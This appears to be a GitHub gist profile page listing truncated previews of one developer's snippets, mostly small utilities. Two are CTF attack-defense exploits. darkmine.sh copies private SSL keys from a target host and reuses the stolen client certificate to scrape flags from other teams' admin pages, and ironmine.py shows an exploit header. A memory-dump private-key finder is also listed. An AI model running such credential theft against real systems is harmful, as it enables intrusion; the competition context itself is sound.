Skip to content

Instantly share code, notes, and snippets.

View ei-grad's full-sized avatar

Andrew Grigorev ei-grad

76 followers · 57 following
View GitHub Profile
@ei-grad
ei-grad / darkmine.sh
Created May 25, 2013 05:09
Darkmine used SSL certificate client auth for access control on /admin/ page, which was used by jury checker. Teams where not able to generate valid client certificate, but they could use the certificate from their apache.
#!/bin/bash
#scp root@vuln:/etc/ssl/private/* .
C="curl -sk -m 10 --key apache.key --cert apache.crt --cacert ca.crt"
while true; do
for team in 1 2 3 4 5 6 7 9 10
do
for salt in `$C https://172.17.$team.3:88/admin | egrep -o 'YOURFLAG\..{64}' | sed 's/YOURFLAG.//g' | sort -u`
@ei-grad
ei-grad / ironmine.py
Created May 25, 2013 05:23
Ironmine exploit
#!/usr/bin/env python
import sys
import logging
from time import sleep
from collections import defaultdict
import socket
from urllib import urlencode
import re
from threading import Thread, Lock
@ei-grad
ei-grad / monthdelta.py
Created June 21, 2013 13:09
from datetime import datetime, date
import calendar
def monthdelta(dt0, months=1):
year = dt0.year + (dt0.month + months) // 12
month = 1 + (dt0.month + months - 1) % 12
maxday = calendar.monthrange(year, month)[1]
if maxday < dt0.day:
d = date(year, month, maxday)
else:
@ei-grad
ei-grad / dictdiff.py
Created June 25, 2013 11:08
def dictdiff(f):
def wrapper(a, b, *args, **kwargs):
try:
f(a, b, *args, **kwargs)
except AssertionError as e:
if isinstance(a, dict) and isinstance(b, dict):
a_items = a.items()
b_items = b.items()
in_a = [i for i in a_items if i not in b_items]
in_b = [i for i in b_items if i not in a_items]
@ei-grad
ei-grad / findkey.c
Last active December 29, 2015 03:29
Find EC private key in the memory dump
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <openssl/ssl.h>
#include <openssl/ec.h>
const char usage[] = "using: %s <memdump.raw> <cert.pem>\n";
int main(int argc, char * argv[]) {
@ei-grad
ei-grad / trinkup
Last active August 5, 2018 23:26
TRivial INcremental bacKUP script (MOVED TO REPOSITORY)
#!/bin/bash
#
# trinkup - TRivial INcremental bacKUP script
#
# Уж 200 раз твердили Сене:
# Хардлинк спасет от удаленья!
# А кто создать его поможет?
# Crontab и man, тупая рожа!
#
# (c) linux.org.ru, no-dashi
@ei-grad
ei-grad / dwmcpudt.sh
Created December 11, 2013 13:24
P=(`</proc/stat awk 'NR==1 { printf("%d %d %d %d\n", $2, $3, $4, $5) }'`)
while true; do
DT="`date +%c`"
C=(`</proc/stat awk 'NR==1 { printf("%d %d %d %d\n", $2, $3, $4, $5) }'`)
CPU="$(( 100 * ((${C[0]} - ${P[0]}) + (${C[1]} - ${P[1]}) + (${C[2]} - ${P[2]})) / ((${C[0]} - ${P[0]}) + (${C[1]} - ${P[1]}) + (${C[2]} - ${P[2]}) + (${C[3]} - ${P[3]})) ))%"
P=(${C[@]})
xsetroot -name "$CPU $DT"
sleep "0.$((1000000000 - `date '+%N' | sed 's/^0\+//'`))"
done &
@ei-grad
ei-grad / fsk-decode.py
Created May 22, 2014 11:08
# FSK-decode
# For Python 3
# By Zoe Blade
# (Hopefully) converts a .wav file into a demodulated .bin file
import struct # For converting the (two's complement?) binary data to integers
import sys # For command line arguments
import wave # For .wav input and output
@ei-grad
ei-grad / px2csv.c
Created June 14, 2014 18:31
Convert Paradox DB table to CSV
// sudo apt-get install pxlib
// gcc -std=c99 -lpx px2csv.c -o px2csv
#include <paradox.h>
#include <stdlib.h>
int main(int argc, char *argv[]) {
FILE *out;
int ret;
@ei-grad
ei-grad / local.py
Last active August 29, 2015 14:02
def my_local(init):
key = object()
def getter():
t = _app_ctx_stack.top
l = getattr(t, 'my_locals')
if l is None:
t.my_locals = l = {}
if key not in l:
l[key] = init()
return l[key]